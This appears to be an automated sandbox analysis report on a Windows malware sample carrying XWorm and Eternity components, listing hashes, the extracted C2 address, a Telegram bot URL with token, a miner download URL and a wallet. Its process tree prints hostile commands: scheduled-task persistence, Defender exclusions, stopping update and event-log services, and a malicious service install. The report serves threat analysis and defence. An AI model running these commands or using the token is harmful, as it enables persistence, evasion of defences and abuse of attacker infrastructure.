Analysis
-
max time kernel
100s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
29-03-2024 00:28
General
-
Target
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
-
Size
455KB
-
MD5
c8d9593196962fa5d706a207c16674cd
-
SHA1
686a8e674e6615d5cd91f7b2cba0c755054b3f69
-
SHA256
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
-
SHA512
5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
-
SSDEEP
12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
Malware Config
Extracted
xworm
5.1
104.194.9.116:7000
bUezpCDHVjUVS3W9
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845
Extracted
eternity
47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q
-
payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Detects Windows executables referencing non-Windows User-Agents 1 IoCs
-
Detects executables packed with or use KoiVM 1 IoCs
-
Detects executables using Telegram Chat Bot 1 IoCs
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 53 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\xfgpkf.exe"C:\Users\Admin\AppData\Local\Temp\xfgpkf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "AddInProcess32" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\AddInProcess32.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\AddInProcess32.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "AddInProcess32" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\AddInProcess32.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\ServiceHub\AddInProcess32.exe"C:\Users\Admin\AppData\Local\ServiceHub\AddInProcess32.exe"6⤵
- Executes dropped EXE
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kccktn.exe"C:\Users\Admin\AppData\Local\Temp\kccktn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵
- Drops startup file
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\crwqcc.exe"C:\Users\Admin\AppData\Local\Temp\crwqcc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"4⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AHIMMUFK"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "AHIMMUFK"5⤵
- Launches sc.exe
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"4⤵
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
-
-
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exeC:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD5a526de1f9de51e1acbc6b8a492673174
SHA19de369d588f9c95e6ba0a5e2ce525365e0531a89
SHA25623c34ff2bb98f028fefab008f83af6c74a5f7b99114e6140cd69212644bf8d3e
SHA512445b35a32f81541a987442980a6baf98725629f454dc42d68921a4c5c901bf48f71fd8a8bfbe25eccd16567688a5f566e65919bf2433bf6beba167035d1c94ce
-
Filesize
321B
MD5baf5d1398fdb79e947b60fe51e45397f
SHA149e7b8389f47b93509d621b8030b75e96bb577af
SHA25610c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8
SHA512b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413
-
Filesize
42KB
MD59827ff3cdf4b83f9c86354606736ca9c
SHA1e73d73f42bb2a310f03eb1bcbb22be2b8eb7c723
SHA256c1cf3dc8fa1c7fc00f88e07ad539979b3706ca8d69223cffd1d58bc8f521f63a
SHA5128261828d55f3b5134c0aeb98311c04e20c5395d4347251746f3be0fb854f36cc7e118713cd00c9867537e6e47d5e71f2b2384fc00c67f0ae1b285b8310321579
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD586e00d529b3b454a84b942ac916211e3
SHA1021c733e5448436b384bf0d3a0ba81f4d0d93f9a
SHA25630e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53
SHA5129a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e
-
Filesize
756KB
MD5d76027fe4cfd48c7f8999c796e50e731
SHA15026422e84bf445e2d141529e2b808187a30d9f6
SHA256148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799
SHA5122e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d
-
Filesize
393KB
MD53f3a51617811e9581aba50376599efa6
SHA19b26aa73f43a4db9b216b90d1aa3e2e4d602fde8
SHA2565f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37
SHA5129ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
144KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
10.8MB
-
Filesize
88KB
-
Filesize
400KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
172KB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
104KB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
192KB
-
Filesize
744KB
-
Filesize
272KB
-
Filesize
384KB
-
Filesize
136KB
-
Filesize
3.8MB
-
Filesize
120KB
-
Filesize
80KB
-
Filesize
624KB
-
Filesize
56KB
-
Filesize
112KB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
656KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
704KB
-
Filesize
104KB
-
Filesize
1.4MB
-
Filesize
64KB
-
Filesize
272KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
264KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
100KB
-
Filesize
112KB
-
Filesize
56KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
96KB
-
Filesize
80KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
7.7MB
-
Filesize
56KB
-
Filesize
40KB
-
Filesize
248KB
-
Filesize
104KB
-
Filesize
216KB
-
Filesize
272KB
-
Filesize
104KB
-
Filesize
496KB
-
Filesize
32KB
-
Filesize
100KB
-
Filesize
112KB
-
Filesize
132KB
-
Filesize
64KB
-
Filesize
108KB
-
Filesize
56KB
-
Filesize
10.8MB
-
Filesize
264KB
-
Filesize
128KB
-
Filesize
296KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
1.5MB
-
Filesize
72KB
-
Filesize
136KB
-
Filesize
2.8MB
-
Filesize
2.8MB